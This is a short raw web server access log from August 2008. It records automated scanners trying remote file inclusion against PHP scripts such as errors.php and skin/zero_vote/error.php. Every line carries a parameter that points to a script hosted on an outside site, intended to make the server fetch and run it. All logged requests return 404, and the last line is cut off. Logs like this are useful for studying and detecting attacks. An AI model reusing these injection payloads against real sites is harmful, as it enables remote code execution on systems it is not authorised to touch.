203.22.204.97 - - [22/Aug/2008:09:59:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
74.52.99.98 - - [22/Aug/2008:10:00:03 -0500] "GET /logs/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:10:00:03 -0500] "GET /errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.221.68.20 - - [22/Aug/2008:10:00:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:10:00:18 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 324 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:10:00:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:10:00:18 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 324 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:10:00:31 -0500] "GET /logs/access_log.1206230400%20//skin/zero_vote/error.php?dir=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 325 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:10:01:33 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://www.kx-td.com/images/bo.do???